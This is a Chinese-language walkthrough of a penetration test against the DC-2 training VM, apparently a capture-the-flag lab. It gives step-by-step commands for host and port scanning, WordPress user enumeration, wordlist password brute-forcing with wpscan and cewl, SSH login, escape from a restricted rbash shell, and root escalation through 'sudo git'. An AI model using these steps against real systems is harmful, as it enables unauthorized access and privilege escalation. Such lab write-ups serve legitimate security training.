提示:本文章主要讲解DC-2主机渗透全过程
以下是本篇文章正文内容可供参考:
一、配置
DC-2主机渗透
网络适配器打开VMnet8;
在VMware中文件 -- 打开 -- 导入DC-2;
开启kali、DC-2.
kali作为攻击机 ip地址:192.168.200.132
DC-2 ip:192.168.200.133
注:确保靶机和攻击机在同一网段,设置同一网络连接方式:kali、DC-2虚拟机设置-网络适配器使用NAT模式.
二、步骤
1.扫描靶机IP:
arp-scan -l
2.扫描靶机开放端口及服务
nmap -sV -p- 192.168.200.133
3.浏览器访问http服务
访问失败
4.修改/etc/hosts文件,手动dns绑定
cat /etc/hosts
vi /etc/hosts
再次访问成功,找到flag1.
发现了flag1给出的提示是:需要使用cewl工具破解密码,用一个身份登录后,能找到下一个flag
所以接下来会用到cewl工具破解密码。使用cewl破解密码前,要先找到该页面的后台登录地址
5.使用目录扫描工具dirb
扫描出目标靶机登陆地址:http://dc-2/wp-admin/admin.php
dirb http://dc-2
访问页面
6.利用wpscan收集登录的账户信息
wpscan --url http://dc-2 -e u
7.制定用户名字典
vi user.txt
8.利用cewl生成口令字典
cewl http://dc-2 -w password.txt
9.利用wpscan进行爆破
wpscan --url http://dc-2 -U user.txt -P password.txt
10.用爆破出来的用户名和密码登录
登陆成功
找到flag2
11.利用爆破出来的用户名和口令ssh远程登录
使用jerry用户被拒绝登录,换tom用户登录成功
ssh jerry@dc-2 -p 7744
ssh tom@dc-2 -p 7744
12.查看文件信息,找到flag3.txt
命令受限,提示-rbash,百度搜索-rbash,实现绕过
13.绕过-rbash
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
找到flag3并查看
14.切换jerry用户
su -jerry
进入家目录:cd /home/jerry
ls看到flag4.txt
15.提权
列出当前用户可以使用的所有sudo命令
sudo -l
发现git命令是root不用命令即可执行,百度搜索git提权
sudo git -p help
在最底下面输入 !/bin/bash
完成提权,进入root根目录,发现final-flag.txt
成功!
总结
以上就是DC-2主机渗透的全部内容。